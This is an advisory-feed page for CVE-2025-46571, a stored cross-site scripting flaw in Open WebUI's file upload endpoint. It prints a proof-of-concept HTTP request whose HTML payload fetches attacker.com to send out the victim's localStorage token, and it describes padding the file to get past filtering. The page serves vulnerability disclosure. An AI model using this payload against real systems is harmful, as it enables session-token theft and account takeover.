CSIRTS // UNIFIED SECURITY ADVISORY FEEDSYS ● ONLINE · POWERED BY INTELFUSIONS.COM

CVE-2025-46571

mediumcovered by 1 sourcefirst seen 2026-07-07
Summary Low privileged users can upload HTML files which contain JavaScript code via the /api/v1/files/ backend endpoint. This endpoint returns a file id, which can be used to open the file in the browser and trigger the JavaScript code in the user's browser. Under the default settings, files uploaded by low-privileged users can only be viewed by admins or themselves, limiting the impact of this vulnerability. Details The following HTTP request can be sent to the backend server to upload a file with the contents: <script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script> POST /api/v1/files/ HTTP/1.1 Host: localhost:8080 Content-Length: 286 authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijg2NjA1NTZhLTc0OWQtNDdmNS1iMjgwLWRiYzkyYzc2ZjM1NiJ9.4cImklYQUVi3dlXmRtQwdZKEleu0cq4tXompMod8X2U User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0PnRBBHKXD9UEdm ------WebKitFormBoundaryr0PnRBBHKXD9UEdm Content-Disposition: form-data; name="file"; filename="test.html" Content-Type: text/html <h1>padding</h1> <script>fetch("https://attacker.com/?token=" + localStorage.getItem("token"))</script> ------WebKitFormBoundaryr0PnRBBHKXD9UEdm-- Note the filename="test.html" , Content-Type: text/html, and <h1>padding</h> in the request's body. These are important because some form of sanitization or filtering was observed which caused errors when uploading an html file that only conained a <script> tag. The backend server responds to the above request with JSON data that contains an id parameter. image This ID can be used to view the uploaded file in the browser at <Backend_URL>/api/v1/files/<file_id>/content/html Because of the authorization checks done on lines https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/files.py#L434-L438, this file can only be viewed by admins

⚡ Watch CVE-2025-46571

Get an email if CVE-2025-46571 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.

Exploitation outlook

Advisory coverage (1)

External references

NVD record for CVE-2025-46571

CVE.org record

Embed the live status

CVE-2025-46571 live status badge — this badge updates automatically when the KEV or exploit status changes. How to embed it →

[![CVE-2025-46571 status](https://www.csirts.com/badge/CVE-2025-46571)](https://www.csirts.com/cve/CVE-2025-46571)